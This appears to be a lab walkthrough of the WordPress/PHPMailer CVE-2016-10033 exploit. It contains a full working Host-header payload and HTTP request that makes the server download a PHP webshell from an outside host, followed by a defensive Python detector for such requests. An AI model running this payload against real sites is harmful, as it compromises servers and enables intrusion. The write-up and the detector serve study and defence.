Vulnerability introduction
Vulnerability name: WordPress remote command execution (CVE-2016-10033)
Vulnerability description:
The WordPress 4.6 remote code execution vulnerability is essentially the PHPMailer vulnerability (CVE-2016-10033) as it surfaces in WordPress core code. It requires no authentication and no plugins, and is exploitable in the default configuration. A remote attacker can use it to execute code.
WordPress uses the PHPMailer component to send mail to users. When a user requests a password reset, PHPMailer sends the reset email; by building a payload from substr (a string-slicing function) and ${run} (a system-call function), remote command execution is possible.
Affected versions
WordPress <= 4.6.0
PHPMailer < 5.2.18
Target walkthrough
1. Open the target range.
2. Go to the login page, click "Lost your password?", and capture the request with Burp Suite.
The vulnerable spot is the lost-password page: when recovering a password, WordPress uses PHPMailer to send the reset email, and with PHPMailer <= 5.2.18 this is an RCE.
3. Build the payload
This payload downloads a.txt from x.x.x.x/a.txt and writes its contents into a.php; a.txt contains a PHP one-line webshell.
aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /var/www/html/a.php x.x.x.x/a.txt}} null)
Notes
Space -> ${substr{10}{1}{$tod_log}}
/ -> ${substr{0}{1}{$spool_directory}}
Converted payload
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}a.php${substr{10}{1}{$tod_log}}x.x.x.x${substr{0}{1}{$spool_directory}}a.txt}} null)
4. Put the payload in the Host header; the POST request is as follows
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}a.php${substr{10}{1}{$tod_log}}x.x.x.x${substr{0}{1}{$spool_directory}}a.txt}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 58
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
A 302 status code in the response below means the command executed successfully.
Connect to a.php with a webshell client and retrieve the flag.
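A defender-side check, added here and not part of the original write-up: it inspects the Host header of captured requests for the Exim string-expansion syntax the payload above relies on and scans a few constructed log lines (the tab-separated "host<TAB>request line" format and the sample lines are assumptions for the example).

```python
import re

# A plain Host header: hostname or IPv4 literal, optional :port.
VALID_HOST = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?(:\d{1,5})?$")

# Exim expansion items and the -be (expansion test) switch used by the
# payload; none of these has a legitimate place in a Host header.
EXPANSION_MARKERS = ("${run{", "${substr{", "$spool_directory", "$tod_log", "-be ")


def inspect_host_header(host: str) -> list:
    """Return the reasons a Host value looks like a PHPMailer/Exim injection
    attempt; an empty list means it is an ordinary hostname."""
    reasons = []
    value = host.strip()
    if not VALID_HOST.match(value):
        reasons.append("host is not a plain hostname[:port]")
    if "(" in value and ")" in value:
        # The argument list reaches sendmail via a parenthesised comment
        # after the address, so parentheses alone are worth flagging.
        reasons.append("parenthesised comment in host")
    for marker in EXPANSION_MARKERS:
        if marker in value:
            reasons.append(f"exim expansion marker {marker!r}")
    return reasons


def scan_log(lines):
    """Yield (line_no, severity, reasons) for lines whose Host is suspicious.
    Requests to the lost-password endpoint are rated high, others medium."""
    for no, line in enumerate(lines, 1):
        host, _, request = line.partition("\t")
        reasons = inspect_host_header(host)
        if reasons:
            severity = "high" if "action=lostpassword" in request else "medium"
            yield no, severity, reasons


# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    "blog.example.com\tPOST /wp-login.php?action=lostpassword HTTP/1.1",
    "aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin}} null)"
    "\tPOST /wp-login.php?action=lostpassword HTTP/1.1",
    "aa(any -froot@localhost -be ${run{/bin/true}} null)\tGET /index.php HTTP/1.1",
]

if __name__ == "__main__":
    for no, severity, reasons in scan_log(SAMPLE_LOG):
        print(f"line {no} [{severity}]: {', '.join(reasons)}")
```

Patching PHPMailer to 5.2.18 or later (and WordPress past 4.6.0) is the real fix; this check only helps spot attempts in traffic you already capture.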